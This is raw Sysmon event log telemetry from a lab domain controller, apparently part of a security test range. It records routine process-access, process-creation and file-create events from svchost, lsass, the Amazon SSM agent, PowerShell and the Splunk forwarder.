Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:23.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:23.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:23.000{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5F-6005-6F00-00000000A301}3372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.000{59A5CD1D-8E5B-6005-5500-00000000A301}37483704C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{59A5CD1D-8E5F-6005-6F00-00000000A301}3372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.000{59A5CD1D-8E5F-6005-6F00-00000000A301}3372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-CimInstance Win32_PnPSignedDriver | Where-Object { $_.DeviceID -eq 'XENBUS\VEN_XS0001&DEV_VBD&REV_00000001\_' -or $_.DeviceClass -eq 'Net' -and ( $_.Manufacturer -like 'Intel*' -or $_.Manufacturer -eq 'Citrix Systems, Inc.' -or $_.Manufacturer -eq 'Amazon Inc.' -or $_.Manufacturer -eq 'Amazon Web Services, Inc.' 
)}" "| Select-Object" "Description, DriverVersion" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E5B-6005-5500-00000000A301}3748C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000002472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:24.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:24.673{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E60-6005-7100-00000000A301}4056C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:24.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:24.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:24.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:24.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.673{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E60-6005-7100-00000000A301}4056C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.673{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E60-6005-7100-00000000A301}4056C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.483{59A5CD1D-8E60-6005-7100-00000000A301}4056C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.579{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E60-6005-7200-00000000A301}2144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:24.579{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E60-6005-7200-00000000A301}2144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000002454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.533{59A5CD1D-8E60-6005-7200-00000000A301}2144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_igol0lsl.ob2.ps12021-01-18 13:34:24.533 10341000x80000000000000002453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
